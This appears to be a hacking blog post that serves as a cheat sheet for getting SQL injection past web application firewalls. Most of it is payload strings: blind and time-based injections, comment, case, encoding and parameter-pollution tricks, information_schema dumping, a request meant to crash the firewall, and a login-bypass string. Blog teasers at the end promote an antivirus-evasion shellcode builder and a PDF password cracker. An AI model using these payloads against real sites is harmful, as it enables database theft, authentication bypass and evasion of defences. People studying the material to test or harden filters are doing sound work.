SQL Injection Bypassing WAF

-

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

SQL Injection – Basic Concepts

There are two types of SQL Injection 
SQL Injection into a String/Char parameter
  Example: SELECT * from table where example = 'Example'SQL Injection into a Numeric parameter
  Example: SELECT * from table where id = 123
  1. Exploitation of SQL Injection vulnerabilities is divided into classes according to the DBMS type and injection conditions.
A vulnerable request can get into Insert, Update, Delete, etc.
  Example: UPDATE users SET pass = '1' where user = 't1' OR 1=1--'
  1. Blind SQL Injection
 Example: select * from table where id = 1 AND if((ascii(lower(substring((select user()),$i,1))))!=$s,1,benchmark(200000,md5(now())))
SLEEP(5)-- 
SELECT BENCHMARK(1000000,MD5('A'));
id=1 OR SLEEP(25)=0 LIMIT 1-- 
id=1) OR SLEEP(25)=0 LIMIT 1-- 
id=1' OR SLEEP(25)=0 LIMIT 1-- 
id=1') OR SLEEP(25)=0 LIMIT 1-- 
id=1)) OR SLEEP(25)=0 LIMIT 1-- 
id=SELECT SLEEP(25)--
      1.Exploitation features for various DBMSs
  Example: (MySQL): SELECT * from table where id = 1 union select 1,2,3
  Example: (PostgreSQL): SELECT * from table where id = 1; select 1,2,3 
 
Bypassing WAF: SQL Injection - Normalization Method

Example Number (1) of a vulnerability in the function of request Normalization.
• The following request doesn’t allow anyone to conduct an attack 
 /?id=1+union+select+1,2,3/*
If there is a corresponding vulnerability in the WAF, this request 
 will be successfully performed
 /?id=1/*union*/union/*select*/select+1,2,3/*
After being processed by WAF, the request will become 
 index.php?id=1/*uni X on*/union/*sel X ect*/select+1,2,3/*
The given example works in case of cleaning of dangerous traffic, not in case of blocking the entire request or the attack source.
Example Number (2) of a vulnerability in the function of request Normalization.
• Similarly, the following request doesn’t allow anyone to conduct an attack 
 /?id=1+union+select+1,2,3/*
If there is a corresponding vulnerability in the WAF, this request will be successfully performed 
 /?id=1+un/**/ion+sel/**/ect+1,2,3--
The SQL request will become 
 SELECT * from table where id =1 union select 1,2,3--
Instead of construction /**/, any symbol sequence that WAF cuts off can be used (e.g., #####,).
The given example works in case of excessive cleaning of incoming data (replacement of a regular expression with the empty string)

'Using HTTP Parameter Pollution (HPP)'

The following request doesn’t allow anyone to conduct an attack 
 /?id=1;select+1,2,3+from+users+where+id=1--
This request will be successfully performed using HPP 
 /?id=1;select+1&id=2,3+from+users+where+id=1--
Successful conduction of an HPP attack bypassing WAF depends on the environment of the application being attacked.
 




Using HTTP Parameter Pollution (HPP)

Vulnerable code 
 SQL=" select key from table where id= "+Request.QueryString("id")
This request is successfully performed using the HPP technique 
 /?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users
The SQL request becomes select key from table where 
 id=1/**/union/*,*/select/*,*/pwd/*,*/from/*,*/users
ByPassing WAF: SQL Injection – HPF

Using HTTP Parameter Fragmentation (HPF)
Vulnerable code example 
 Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']);
 Query("select * from table where a=".$_GET['a']." and b=".$_GET['b']." limit".$_GET['c']);
The following request doesn’t allow anyone to conduct an attack 
 /?a=1+union+select+1,2/*
These requests may be successfully performed using HPF 
 /?a=1+union/*&b=*/select+1,2
 /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users--
The SQL requests become 
 select * from table where a=1 union/* and b=*/select 1,2
 select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--
Bypassing WAF: Blind SQL Injection

Using logical requests AND/OR
• The following requests allow one to conduct a successful attack for many WAFs 
 /?id=1+OR+0x50=0x50
 /?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
Negation and inequality signs (!=, <>, <, >) can be used instead of the equality one – It is amazing, but many WAFs miss it!
It becomes possible to exploit the vulnerability with the method of blind-SQL Injection by replacing SQL functions that get to WAF signatures with their synonyms.
substring() -> mid(), substr()
ascii() -> hex(), bin()
benchmark() -> sleep()
Wide variety of logical requests.
and 1
or 1
and 1=1
and 2
and 'a'<>'b'
and char(32)=' '
and 3<=2
and 5<=>4
and 5<=>5
and 5 is null
or 5 is not null
....
An example of various request notations with the same meaning.

select user from mysql.user where user = 'user' OR mid(password,1,1)='*'
select user from mysql.user where user = 'user' OR mid(password,1,1)=0x2a
select user from mysql.user where user = 'user' OR mid(password,1,1)=unhex('2a')
select user from mysql.user where user = 'user' OR mid(password,1,1) regexp '[*]'
select user from mysql.user where user = 'user' OR mid(password,1,1) like '*'
select user from mysql.user where user = 'user' OR mid(password,1,1) rlike '[*]'
select user from mysql.user where user = 'user' OR ord(mid(password,1,1))=42
select user from mysql.user where user = 'user' OR ascii(mid(password,1,1))=42
select user from mysql.user where user = 'user' OR find_in_set('2a',hex(mid(password,1,1)))=1
select user from mysql.user where user = 'user' OR position(0x2a in password)=1
select user from mysql.user where user = 'user' OR locate(0x2a,password)=1
Known:
substring((select 'password'),1,1) = 0x70
substr((select 'password'),1,1) = 0x70
mid((select 'password'),1,1) = 0x70
New:
strcmp(left('password',1), 0x69) = 1
strcmp(left('password',1), 0x70) = 0
strcmp(left('password',1), 0x71) = -1
STRCMP(expr1,expr2) returns 0 if the strings are the same, -1 if the first , argument is smaller than the second one, and 1 otherwise.

An example of signature bypass.

The following request gets to WAF signature
/?id=1+union+(select+1,2+from+users)
But sometimes, the signatures used can be bypassed
/?id=1+union+(select+'xz'from+xxx)
/?id=(1)union(select(1),mid(hash,1,32)from(users))
/?id=1+union+(select'1',concat(login,hash)from+users)
/?id=(1)union(((((((select(1),hex(hash)from(users))))))))
/?id=(1)or(0x50=0x50)

An SQL Injection attack can successfully bypass the WAF , and be conducted in all following cases:

• Vulnerabilities in the functions of WAF request normalization.
•Application of HPP and HPF techniques.
•Bypassing filter rules (signatures).
•Vulnerability exploitation by the method of blind SQL Injection.
• Attacking the application operating logics (and/or)

WAF Bypassing Strings.
  
 /*!%55NiOn*/ /*!%53eLEct*/

%55nion(%53elect 1,2,3)-- -

 +union+distinct+select+

 +union+distinctROW+select+

 /**//*!12345UNION SELECT*//**/

 concat(0x223e,@@version)

 concat(0x273e27,version(),0x3c212d2d)

 concat(0x223e3c62723e,version(),0x3c696d67207372633d22)

 concat(0x223e,@@version,0x3c696d67207372633d22)

 concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62​723e)

 concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)

 concat(‘’,@@version,’’)

 /**//*!50000UNION SELECT*//**/

 /**/UNION/**//*!50000SELECT*//**/

 /*!50000UniON SeLeCt*/

 union /*!50000%53elect*/

 +#uNiOn+#sEleCt

 +#1q%0AuNiOn all#qa%0A#%0AsEleCt

 /*!%55NiOn*/ /*!%53eLEct*/

 /*!u%6eion*/ /*!se%6cect*/

 +un/**/ion+se/**/lect

 uni%0bon+se%0blect

%2f**%2funion%2f**%2fselect

 union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A

 REVERSE(noinu)+REVERSE(tceles)

 /*--*/union/*--*/select/*--*/

 union (/*!/**/ SeleCT */ 1,2,3)

 /*!union*/+/*!select*/

 union+/*!select*/

 /**/union/**/select/**/

 /**/uNIon/**/sEleCt/**/

 /**//*!union*//**//*!select*//**/

 /*!uNIOn*/ /*!SelECt*/

 +union+distinct+select+

 +union+distinctROW+select+

 +UnIOn%0d%0aSeleCt%0d%0a

 UNION/*&test=1*/SELECT/*&pwn=2*/

 un?+un/**/ion+se/**/lect+

 +UNunionION+SEselectLECT+

 +uni%0bon+se%0blect+

%252f%252a*/union%252f%252a /select%252f%252a*/

 /%2A%2A/union/%2A%2A/select/%2A%2A/

%2f**%2funion%2f**%2fselect%2f**%2f

 union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A

 /*!UnIoN*/SeLecT+
Union Select by PASS with Url Encoded Method:
%55nion(%53elect) 
 union%20distinct%20select 
 
 union%20%64istinctRO%57%20select

 union%2053elect

 %23?%0auion%20?%23?%0aselect

 %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect

 %55nion%53eLEct

 u%6eion se%6cect

 unio%6e%73elect

 unio%6e%20%64istinc%74%20%73elect

 uni%6fn distinct%52OW s%65lect

 %75%6e%6f%69%6e%61%6c%6c%73%65%6c%65%63%7 
Illegal mix of Collations ByPass Method: 
   unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))) /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037) 
 
 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)?

Bypass with Comments

SQL comments allow us to bypass a lot of filtering and WAFs. 
 Code:
 http://hackersidea.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3--

Case Changing

Some WAFs filter only lowercase SQL keyword.
Regex Filter: /union\sselect/g 
http://hackersidea.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3--

Replaced Keywords

Some application and WAFs use preg_replace to remove all SQL keyword. So we can bypass easily. 
http://hackersidea.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--
Some case SQL keyword was filtered out and replaced with whitespace. So we can use "%0b" to bypass. 
http://hackersidea.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--
For Mod_rewrite, Comments "/**/" cannot bypassed. So we use "%0b" replace "/**/". 
Forbidden: http://hackersidea.com/main/news/id/1/**/||/**/lpad(first_name,7,1).html
Bypassed: 
http://hackersidea.com/main/news/id/1%0b||%0blpad(first_name,7,1).html

Advanced Methods

Crash Firewall via doing Buffer Over Flow.
1) Buffer Overflow / Firewall Crash: Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow. 
    http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 “A”)..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….

    You can test if the WAF can be crashed by typing:
   ?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….

    If you get a 500, you can exploit it using the Buffer Overflow Method.
2) Replace Characters with their HEX Values: We can replace some characters with their HEX (URL-Encoded) Values. 
Example:
    http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….
    (which means “union select”)
4) Misc Exploitable Functions: Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!): 
Example:
    This firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this:
    http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4…
    (If the Firewall removes the “*”, the result will be: 15+union+select….)
    So, if you find such a silly function, you can exploit it, in this way.

Auth Bypass

If we need to bypass some admin panels, and we do that using or 1=1. 
Code:
or 1-- -' or 1 or '1"or 1 or"
SELECT * FROM login WHERE id=1 or 1-- -' or 1 or '1"or 1 or" AND username= AND password= the "or 1-- -" gets active, make the condition true and ignores the rest of the query. now lets check regular string-
SELECT * FROM login WHERE username=' or 1-- -' or 1 or '1"or 1 or" ' ..... the "or 1" part make the query true, and the other parts are considered as the comparison strings. same with the double quotes. SELECT * FROM login WHERE username=" or 1-- -' or 1 or '1"or 1 or" "

Comments

Post a Comment

Popular posts from this blog

Avet – Open Source Anti-Virus Evasion Tool

-
Image
When we want to perform an exploitation to a windows target, we need a payload that is undetectable to Antivirus Solutions. Msfvenom on its own is not enough. So we need an AV evasion tool to make this easy for us. Avet is a tool for building exe files with shellcode payloads for antivirus evasion. Installing Avet First clone the repository to our machine. git clone https://github.com/govolution/avet.git   After that go inside the folder and run the setup file to install wine and other missing components. cd avet/       Run the setup file to install the missing components.   ./setup.sh     Select create  for new installation   Running Avet There are two ways to run avet. Run avet by typing the command below. python avet_fabric.py   There are two ways to run avet. Either by compiling the make_avet script as shown below, or by  running the avet_fabric.py scr...
Read more

How to Repair Kali Linux grub after installing Windows in Dual boot System

-
Image
If your System has primary OS Windows then you install your secondary OS Kali Linux. That will be OK, Kali Linux puts boot entry of Windows automatically for you. At initial boot menu you can see both OS entry to boot. If your windows is corrupt in dual boot system or if you want to install windows as secondary OS after installing Kali Linux as primary OS. You may face corrupt boot-loader menu. You wont be able to boot Kali Linux any more because Windows wont put entry of Kali Linux automatically in their boot menu. So this post motive is to help those guys which are facing those problems subjecting to corrupt Boot-loader. There are mainly two methods: 1. Repair Grub via Kali Linux live USB. 2. Repair Grub Via Boot-rapair-disk. Method 1# Repair Grub via Kali Linux live USB It is up to you which you want to choose but if you are Linux familiar then go for this method. Requirements 1. A Kali Linux ISO image. You can download here: Download Kali Linux...
Read more

PDFCrack - Password Cracking Tool for PDF-files

-
Image
PDFcrack is a GNU/Linux tool for cracking password protected PDF files. It is a very small command line application. It is not preinstalled in kali linux. We can install through command line. For installing pdfcrack open a terminal and enter apt install pdfcrack Syntax and options Usage: pdfcrack -f filename [OPTIONS]           : pdfcrack -f filenmae -w passwordfile.txt OPTIONS : -b, --bench perform benchmark and exit -c, --charset=STRING Use the characters in STRING as charset -w, --wordlist=FILE Use FILE as source of passwords to try -n, --minpw=INTEGER Skip trying passwords shorter than this -m, --maxpw=INTEGER Stop when reaching this passwordlength -l, --loadState=FILE Continue from the state saved in FILENAME -o, --owner Work with the ownerpassword -u, --user Work with the userpassword (default) -p, --password=STRING Give userpassword to speed up breaking ownerpassword (...
Read more